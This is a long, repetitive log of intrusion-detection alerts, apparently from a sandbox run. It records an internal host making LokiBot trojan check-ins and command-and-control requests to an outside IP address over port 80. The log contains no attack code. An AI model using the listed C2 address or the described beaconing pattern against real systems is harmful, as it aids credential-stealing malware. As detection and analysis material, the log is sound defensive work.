                                11/22/21-15:33:37.804282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011180192.168.11.20192.185.217.246
                                11/22/21-15:33:37.804282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011180192.168.11.20192.185.217.246
                                11/22/21-15:33:37.804282TCP2025381ET TROJAN LokiBot Checkin5011180192.168.11.20192.185.217.246
                                11/22/21-15:33:37.804282TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011180192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011280192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011280192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2025381ET TROJAN LokiBot Checkin5011280192.168.11.20192.185.217.246
                                11/22/21-15:33:38.640577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011280192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011380192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011380192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2025381ET TROJAN LokiBot Checkin5011380192.168.11.20192.185.217.246
                                11/22/21-15:33:39.464794TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011380192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011480192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011480192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2025381ET TROJAN LokiBot Checkin5011480192.168.11.20192.185.217.246
                                11/22/21-15:33:40.293467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011480192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011580192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011580192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2025381ET TROJAN LokiBot Checkin5011580192.168.11.20192.185.217.246
                                11/22/21-15:33:41.339865TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011580192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011680192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011680192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2025381ET TROJAN LokiBot Checkin5011680192.168.11.20192.185.217.246
                                11/22/21-15:33:42.379235TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011680192.168.11.20192.185.217.246
                                11/22/21-15:33:43.482146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011780192.168.11.20192.185.217.246
                                11/22/21-15:33:43.482146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011780192.168.11.20192.185.217.246
                                11/22/21-15:33:43.482146TCP2025381ET TROJAN LokiBot Checkin5011780192.168.11.20192.185.217.246
                                11/22/21-15:33:43.482146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011780192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011880192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011880192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2025381ET TROJAN LokiBot Checkin5011880192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011880192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011980192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011980192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2025381ET TROJAN LokiBot Checkin5011980192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011980192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012080192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012080192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2025381ET TROJAN LokiBot Checkin5012080192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012080192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012180192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012180192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2025381ET TROJAN LokiBot Checkin5012180192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012180192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2025381ET TROJAN LokiBot Checkin5012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012380192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012380192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2025381ET TROJAN LokiBot Checkin5012380192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012380192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012480192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012480192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2025381ET TROJAN LokiBot Checkin5012480192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012480192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012580192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012580192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2025381ET TROJAN LokiBot Checkin5012580192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012580192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012680192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012680192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2025381ET TROJAN LokiBot Checkin5012680192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012680192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2025381ET TROJAN LokiBot Checkin5012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012880192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012880192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2025381ET TROJAN LokiBot Checkin5012880192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012880192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012980192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012980192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2025381ET TROJAN LokiBot Checkin5012980192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012980192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013080192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013080192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2025381ET TROJAN LokiBot Checkin5013080192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013080192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013180192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013180192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2025381ET TROJAN LokiBot Checkin5013180192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013180192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2025381ET TROJAN LokiBot Checkin5013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013380192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013380192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2025381ET TROJAN LokiBot Checkin5013380192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013380192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013480192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013480192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2025381ET TROJAN LokiBot Checkin5013480192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013480192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013580192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013580192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2025381ET TROJAN LokiBot Checkin5013580192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013580192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013680192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013680192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2025381ET TROJAN LokiBot Checkin5013680192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013680192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013780192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013780192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2025381ET TROJAN LokiBot Checkin5013780192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013780192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2025381ET TROJAN LokiBot Checkin5013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013980192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013980192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2025381ET TROJAN LokiBot Checkin5013980192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013980192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014080192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014080192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2025381ET TROJAN LokiBot Checkin5014080192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014080192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014180192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014180192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2025381ET TROJAN LokiBot Checkin5014180192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014180192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014280192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014280192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2025381ET TROJAN LokiBot Checkin5014280192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014280192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2025381ET TROJAN LokiBot Checkin5014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014480192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014480192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2025381ET TROJAN LokiBot Checkin5014480192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014480192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014580192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014580192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2025381ET TROJAN LokiBot Checkin5014580192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014580192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014680192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014680192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2025381ET TROJAN LokiBot Checkin5014680192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014680192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014780192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014780192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2025381ET TROJAN LokiBot Checkin5014780192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014780192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2025381ET TROJAN LokiBot Checkin5014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.925664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014980192.168.11.20192.185.217.246
                                11/22/21-15:35:00.702806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021180192.168.11.20192.185.217.246
                                11/22/21-15:35:00.702806TCP2025381ET TROJAN LokiBot Checkin5021180192.168.11.20192.185.217.246
                                11/22/21-15:35:00.702806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021180192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021280192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021280192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2025381ET TROJAN LokiBot Checkin5021280192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021280192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021380192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021380192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2025381ET TROJAN LokiBot Checkin5021380192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021380192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021480192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021480192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2025381ET TROJAN LokiBot Checkin5021480192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021480192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021580192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021580192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2025381ET TROJAN LokiBot Checkin5021580192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021580192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2025381ET TROJAN LokiBot Checkin5021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021780192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021780192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2025381ET TROJAN LokiBot Checkin5021780192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021780192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021880192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021880192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2025381ET TROJAN LokiBot Checkin5021880192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021880192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021980192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021980192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2025381ET TROJAN LokiBot Checkin5021980192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021980192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022080192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022080192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2025381ET TROJAN LokiBot Checkin5022080192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022080192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2025381ET TROJAN LokiBot Checkin5022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022280192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022280192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2025381ET TROJAN LokiBot Checkin5022280192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022280192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022380192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022380192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2025381ET TROJAN LokiBot Checkin5022380192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022380192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022480192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022480192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2025381ET TROJAN LokiBot Checkin5022480192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022480192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022580192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022580192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2025381ET TROJAN LokiBot Checkin5022580192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022580192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2025381ET TROJAN LokiBot Checkin5022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022780192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022780192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2025381ET TROJAN LokiBot Checkin5022780192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022780192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022880192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022880192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2025381ET TROJAN LokiBot Checkin5022880192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022880192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022980192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022980192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2025381ET TROJAN LokiBot Checkin5022980192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022980192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023080192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023080192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2025381ET TROJAN LokiBot Checkin5023080192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023080192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023180192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023180192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2025381ET TROJAN LokiBot Checkin5023180192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023180192.168.11.20192.185.217.246
                                11/22/21-15:35:18.210309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023280192.168.11.20192.185.217.246
